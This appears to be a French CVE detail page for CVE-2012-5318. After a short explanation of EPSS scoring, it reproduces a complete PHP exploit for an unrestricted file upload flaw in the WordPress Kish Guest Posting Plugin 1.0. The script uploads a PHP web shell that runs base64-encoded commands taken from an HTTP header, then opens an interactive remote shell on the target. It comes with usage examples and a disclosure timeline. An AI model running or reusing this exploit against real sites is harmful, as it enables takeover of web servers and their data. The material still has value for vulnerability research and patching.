CVE-2012-5318 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

<?php /* -------------------------------------------------------------------------------- Wordpress Kish Guest Posting Plugin 1.0 (uploadify.php) Unrestricted File Upload -------------------------------------------------------------------------------- author............: Egidio Romano aka EgiX mail..............: n0b0d13s[at]gmail[dot]com software link.....: http://kishpress.com/guest-posting-plugin/ +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] vulnerable code in /uploadify/scripts/uploadify.php 26. if (!empty($_FILES)) { 27. $tempFile = $_FILES['Filedata']['tmp_name']; 28. $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/'; 29. $targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name']; 30. // $fileTypes = str_replace('*.','',$_REQUEST['fileext']); 31. // $fileTypes = str_replace(';','|',$fileTypes); 32. // $typesArray = split('\|',$fileTypes); 33. // $fileParts = pathinfo($_FILES['Filedata']['name']); 34. 35. // if (in_array($fileParts['extension'],$typesArray)) { 36. // Uncomment the following line if you want to make the directory if it doesn't exist 37. // mkdir(str_replace('//','/',$targetPath), 0755, true); 38. 39. move_uploaded_file($tempFile,$targetFile); 40. echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile); 41. // } else { 42. // echo 'Invalid file type.'; 43. // } 44. } Restricted access to this script isn't properly realized, so an attacker might be able to upload arbitrary files containing malicious PHP code due to uploaded file extension isn't properly checked. [-] Disclosure timeline: [19/12/2011] - Vulnerability discovered [19/12/2011] - Vendor notified through http://kish.in/contact-me/ [07/01/2012] - No response from vendor, notified again via email [16/01/2012] - After four weeks still no response [23/01/2012] - Public disclosure */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n+----------------------------------------------------------------------------------+"; print "\n| Wordpress Kish Guest Posting Plugin 1.0 Unrestricted File Upload Exploit by EgiX |"; print "\n+----------------------------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /wordpress/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"sh.php\"\r\n\r\n"; $payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n"; $payload .= "--o0oOo0o--\r\n"; $packet = "POST {$path}wp-content/plugins/kish-guest-posting/uploadify/scripts/uploadify.php?folder={$path} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; if (!preg_match('/sh.php/', http_send($host, $packet))) die("\n[-] Upload failed!\n"); $packet = "GET {$path}sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\nkish-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ?>